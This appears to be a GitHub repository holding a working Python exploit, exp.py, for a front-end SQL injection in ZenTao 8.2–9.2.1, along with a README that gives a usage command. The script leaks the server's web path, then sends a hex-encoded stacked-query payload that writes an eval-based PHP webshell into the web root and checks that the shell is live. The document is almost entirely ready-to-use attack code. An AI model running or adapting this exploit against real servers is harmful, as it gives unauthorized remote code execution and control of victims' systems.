├── README.md
├── exp.py
├── zentao.gif
└── zentao.jpg


/README.md:
--------------------------------------------------------------------------------
 1 | # zentao-getshell 禅道8.2 - 9.2.1前台Getshell
 2 | ## Python Usage
 3 | 
 4 | `python exp.py http://127.0.0.1:81/ jas502n.php`
 5 | 
 6 | ![](./zentao.jpg)
 7 | 
 8 | 
 9 | ![](./zentao.gif)
10 | 
11 | 


--------------------------------------------------------------------------------
/exp.py:
--------------------------------------------------------------------------------
 1 | #coding=utf-8
 2 | import requests
 3 | import base64
 4 | import re
 5 | import sys
 6 | import os
 7 | import json
 8 | 
 9 | 
10 | banner = '''
11 |  ________   _______ .__   __.       .___________.    ___       ______   
12 | |       /  |   ____||  \ |  |       |           |   /   \     /  __  \  
13 | `---/  /   |  |__   |   \|  |       `---|  |----`  /  ^  \   |  |  |  | 
14 |    /  /    |   __|  |  . `  |           |  |      /  /_\  \  |  |  |  | 
15 |   /  /----.|  |____ |  |\   |           |  |     /  _____  \ |  `--'  | 
16 |  /________||_______||__| \__|           |__|    /__/     \__\ \______/  
17 |                                                                                                                                                 
18 |                     v8.2 - 9.2.1 Getshell
19 | 
20 |                       python by jas502n
21 | 
22 |     usage: python exp.py http://127.0.0.1:81/zentao webshell.php
23 |                                                                                                                                                                                          
24 | '''
25 | print banner
26 | 
27 | def get_web_dir(url,filename):
28 |     if url[-1] == '/':
29 |         url = url[:-1]
30 |     else:
31 |         url = url
32 | 
33 |     payload = '''{"orderBy":"order limit 1,1'","num":"1,1","type":"openedbyme"}'''
34 |     base64encode_str = base64.b64encode(payload)
35 |     web_dir = url + "/zentao/index.php?m=block&f=main&mode=getblockdata&blockid=case&param=" + base64encode_str
36 |     version_url = url + "/zentao/index.php?mode=getconfig"
37 |     r0 = requests.get(url=version_url)
38 |     json_str = json.loads(r0.text)
39 |     print "Cuurent Version= " + json_str['version']
40 |     print '\n' + web_dir
41 | 
42 |     headers = {
43 |     "Referer":"http://127.0.0.1:81/zentao",
44 |     "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0"
45 |     }
46 | 
47 |     r= requests.get(url=web_dir, headers=headers)
48 |     if r.status_code==200 and 'SELECT' in r.content:
49 |         print '\n'
50 |         print r.content
51 |         m = re.compile(r'.*in <strong>(.*)</strong> on')
52 |         print
53 |         www_dir = m.findall(r.content)[0]
54 |         www_root = www_dir.replace('\\', "//")
55 |         print www_root
56 |         m = re.compile(r'(.*)framework',re.DOTALL)
57 | 
58 |         # print '>>>>WWWROOT INSTALL: ' + 
59 |         get_shell = "select '<?php @eval($_POST[1])?>' into outfile '%s'" % (m.findall(www_root)[0] + 'www//' + filename)
60 |         print '\n%s\n' % get_shell
61 |         hex_str = get_shell.encode('hex')
62 |         payload1 = '''{"orderBy":"order limit 1;SET @SQL=0x%s;PREPARE pord FROM @SQL;EXECUTE pord;-- -","num":"1,1","type":"openedbyme"}''' % hex_str
63 |         getshell_url = url + "/zentao/index.php?m=block&f=main&mode=getblockdata&blockid=case&param=" + base64.b64encode(payload1)
64 |         # print "GetShell_URL=\n\n%s" % getshell_url
65 | 
66 |         headers = {
67 |         "Referer":"%s/zentao"%url,
68 |         "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0"
69 |         }
70 |         r1 = requests.get(url=getshell_url,headers=headers)
71 |         if r1.status_code == 200 and 'ID' in r1.content:
72 |             print getshell_url
73 | 
74 |             webshell = url + "/zentao/" + filename
75 |             r2 = requests.get(url=webshell)
76 |             if r2.status_code == 200:
77 |                 print "\n\n>>>>Webshell: \n%s" % webshell
78 |             else:
79 |                 print "No Webshell Exit!"
80 |         else:
81 |             print "No Send Success into file!"
82 |         
83 | 
84 |     else:
85 |         print "No Exit!"
86 | 
87 | 
88 | 
89 | 
90 | if __name__ == "__main__":
91 |     # url = "http://127.0.0.1:81/"
92 |     url = sys.argv[1]
93 |     filename = sys.argv[2]
94 |     get_web_dir(url,filename)


--------------------------------------------------------------------------------
/zentao.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/zentao-getshell/ea6a7e0772f4128c243fd60319bcbab3a9c9306a/zentao.gif


--------------------------------------------------------------------------------
/zentao.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/zentao-getshell/ea6a7e0772f4128c243fd60319bcbab3a9c9306a/zentao.jpg


--------------------------------------------------------------------------------